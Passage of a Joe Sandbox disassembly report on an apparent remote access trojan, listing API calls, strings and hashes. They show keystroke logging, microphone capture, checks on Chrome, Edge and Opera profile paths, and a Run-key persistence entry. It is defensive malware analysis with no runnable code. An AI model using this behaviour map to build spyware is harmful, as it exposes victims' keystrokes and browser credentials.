                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 52f1b42f153ed4b644b91f11fc4c23a59010ae0a013f6087acbd7f2f1f111652
                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                  • Opcode Fuzzy Hash: 52f1b42f153ed4b644b91f11fc4c23a59010ae0a013f6087acbd7f2f1f111652
                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$hYG
                                                  • API String ID: 1174141254-2782910960
                                                  • Opcode ID: 7f74c5974817e7ba13f1ccd263a025762fd74d89f9f55a83648a59f77019ac27
                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                  • Opcode Fuzzy Hash: 7f74c5974817e7ba13f1ccd263a025762fd74d89f9f55a83648a59f77019ac27
                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: 539f72ab5f86f5c342155b2b16da774537cba30e5d1a0a8ca2b311f7dcb13205
                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: 539f72ab5f86f5c342155b2b16da774537cba30e5d1a0a8ca2b311f7dcb13205
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                  • _free.LIBCMT ref: 00449B4C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$DeleteEnter_free
                                                  • String ID: Pom
                                                  • API String ID: 1836352639-1117494575
                                                  • Opcode ID: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                  • Instruction ID: 49f98359192604db3700e7d46e2ee0879056decf89b11c46129577f8840becb7
                                                  • Opcode Fuzzy Hash: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                  • Instruction Fuzzy Hash: C3115E31500214DFEB20DFA8E846B5D73B0FB04724F10455AE8599B2E6CBBCEC429B0D
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _abort.LIBCMT ref: 0044F129
                                                  • _free.LIBCMT ref: 0044F15D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_abort_free
                                                  • String ID: hOl
                                                  • API String ID: 289325740-2321562931
                                                  • Opcode ID: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                                  • Instruction ID: a8e40e627a719db10bf70d85eeadc0c4c2fb790701f4ec7f842983f146219858
                                                  • Opcode Fuzzy Hash: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                                  • Instruction Fuzzy Hash: 0501A1B1D01A21DBEB31AFA9D84265EB3A0BF04720B19012FE51463391CB386D46CBCE
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(006CE5F8,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                  • waveInAddBuffer.WINMM(006CE5F8,00000020,?,00000000,00401A15), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: H{l
                                                  • API String ID: 2315374483-151488548
                                                  • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                  • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: X,l
                                                  • API String ID: 269201875-3772506311
                                                  • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                  • Instruction ID: 4a6f060c21597e0392f33703011e6e0157da39883ddad7ec559e06d861eb6f1f
                                                  • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                  • Instruction Fuzzy Hash: 64E0E532A0152014F6713A3B6D1665B45C68BC1B3AF22423FF425962C2DFAC8946516E
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: 67a37633ad4a3934eb7a9710067efd7b2c9a9b469ed032209e18e61634ff2717
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: 67a37633ad4a3934eb7a9710067efd7b2c9a9b469ed032209e18e61634ff2717
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: 7414731bf553168197ebf71208b97339720711320eac3921dee6b082f9eb1638
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: 7414731bf553168197ebf71208b97339720711320eac3921dee6b082f9eb1638
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 8000172e7e681251177a335894fd2e2a37e3823944c94c6a399ddcaad00f7658
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 8000172e7e681251177a335894fd2e2a37e3823944c94c6a399ddcaad00f7658
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: $G
                                                  • API String ID: 269201875-4251033865
                                                  • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                  • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                  • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                  • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: 0f70a0069a612ae1fb5ede6b6ff70f96726a9fd1eec0d97551c5347f5f324e5e
                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                  • Opcode Fuzzy Hash: 0f70a0069a612ae1fb5ede6b6ff70f96726a9fd1eec0d97551c5347f5f324e5e
                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  • API String ID: 587946157-1586967515
                                                  • Opcode ID: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                  • Opcode Fuzzy Hash: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 1d2d80fd5b8c20147d0c6ff4d402c2e3edc42c22dff79285f987829e6048126c
                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                  • Opcode Fuzzy Hash: 1d2d80fd5b8c20147d0c6ff4d402c2e3edc42c22dff79285f987829e6048126c
                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                  APIs
                                                    • Part of subcall function 00449ADC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                    • Part of subcall function 00449ADC: _free.LIBCMT ref: 00449B4C
                                                    • Part of subcall function 00449B7C: _free.LIBCMT ref: 00449B9E
                                                  • DeleteCriticalSection.KERNEL32(006D6F30), ref: 0043C241
                                                  • _free.LIBCMT ref: 0043C255
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$CriticalDeleteSection
                                                  • String ID: Pom
                                                  • API String ID: 1906768660-1117494575
                                                  • Opcode ID: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                  • Instruction ID: 53b3c8965ed62865b06495ab0c988fe80dbb580c75aaeb32feec7d00177b517a
                                                  • Opcode Fuzzy Hash: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                  • Instruction Fuzzy Hash: F8E04F328145208FEB71BB69FD4595A73E4EB4D325B12086FF80DA3165CAADAC809B4D
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 1881088180-2015055088
                                                  • Opcode ID: bf6eaf7ad603c651630b5b847c32adb66bdf614d62153d48efbad85f1494e607
                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                  • Opcode Fuzzy Hash: bf6eaf7ad603c651630b5b847c32adb66bdf614d62153d48efbad85f1494e607
                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,86l,004752F0,?,pth_unenc), ref: 00413A6C
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                  Memory Dump Source
